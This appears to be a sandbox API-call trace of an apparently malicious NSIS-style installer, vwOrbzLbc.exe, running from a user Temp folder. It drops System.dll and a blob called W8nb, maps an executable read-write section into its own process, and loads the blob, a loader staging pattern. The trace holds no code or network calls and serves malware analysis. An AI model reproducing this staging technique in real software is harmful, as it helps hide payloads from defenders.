Module	Load	module_name = C:\Windows\system32\PROPSYS.dll, base_address = 0x732c0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\DWMAPI.dll, base_address = 0x740f0000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\CRYPTBASE.dll, base_address = 0x74290000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\OLEACC.dll, base_address = 0x73260000	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\CLBCATQ.dll, base_address = 0x742c0000	1	Fn
Module	Get Handle	module_name = VERSION, base_address = 0x0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\VERSION.dll, base_address = 0x73d50000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\version.dll, function = GetFileVersionInfoA, address_out = 0x73d51f80	1	Fn
Module	Get Handle	module_name = SHFOLDER, base_address = 0x0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\SHFOLDER.dll, base_address = 0x73250000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shfolder.dll, function = SHGetFolderPathA, address_out = 0x73251300	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe, base_address = 0x400000	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\	1	Fn
System	Get Time	type = Ticks, time = 106796	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12C.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp\, prefix = nsg	1	Fn
File	Delete	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12C.tmp	1	Fn
System	Get Time	type = Ticks, time = 106796	1	Fn
Module	Get Filename	module_name = SHFOLDER, process_name = c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 1024	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, type = size	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 512, size_out = 512	79	Fn Data
System	Get Time	type = Ticks, time = 106796	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp\, prefix = nsg	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_TEMPORARY, FILE_FLAG_DELETE_ON_CLOSE	1	Fn
System	Get Time	type = Ticks, time = 106796	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 32768	2	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 14048	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 106828	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 31488, size_out = 31488	1	Fn Data
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x76bda6f0	1	Fn
File	Create Directory	C:\Users	1	Fn
File	Get Info	filename = C:\Users, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	1	Fn
System	Get Time	type = Ticks, time = 106828	1	Fn
File	Create Temp File	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp, path = C:\Users\CIIHMN~1\AppData\Local\Temp, prefix = nsm	1	Fn
File	Delete	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp	1	Fn
File	Create Directory	C:\Users	1	Fn
File	Get Info	filename = C:\Users, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local, type = file_attributes	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp, type = file_attributes	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\shell32.dll, base_address = 0x74760000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x749ffa00	1	Fn
File	Create Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
System	Get Time	type = Ticks, time = 106828	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 106828	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 11264, size_out = 11264	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, size = 11264	1	Fn Data
Module	Get Handle	module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\msvcrt.dll, base_address = 0x75b80000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x75bc78c0	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x76bda1f0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x74500000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7452ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, type = file_attributes	2	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 25540	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 4, size_out = 4	1	Fn Data
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16141	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16153	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 106968	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16149	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\vwOrbzLbc.exe, size = 16384, size_out = 16384	1	Fn Data
System	Get Time	type = Ticks, time = 106984	1	Fn
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 24930	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 16384, size_out = 16384	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 16384	1	Fn Data
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsgA12D.tmp, size = 6023, size_out = 6023	1	Fn Data
File	Write	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 6023	1	Fn Data
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateFile, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76be6170	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, desired_access = GENERIC_READ	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x74500000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7452ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77190000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x771f9080	1	Fn
Module	Create Mapping	protection = PAGE_EXECUTE_READWRITE, maximum_size = 5955600	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x74500000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7452ea00	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77190000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x771f8e60	1	Fn
Module	Map	process_name = c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1eb0000	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ReadFileA, address_out = 0x0	1	Fn
File	Read	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\W8nb, size = 71559, size_out = 71559	1	Fn Data
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Int64Op, address_out = 0x1000180d	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Int64Op, address_out = 0x1000180d	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\AppData\Local\Temp\nsmA14E.tmp\System.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_ARCHIVE, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Handle	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, base_address = 0x10000000	1	Fn
Module	Get Address	module_name = c:\users\ciihmn~1\appdata\local\temp\nsma14e.tmp\system.dll, function = Call, address_out = 0x100016bd	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x74500000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintf, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7452ea00	1	Fn
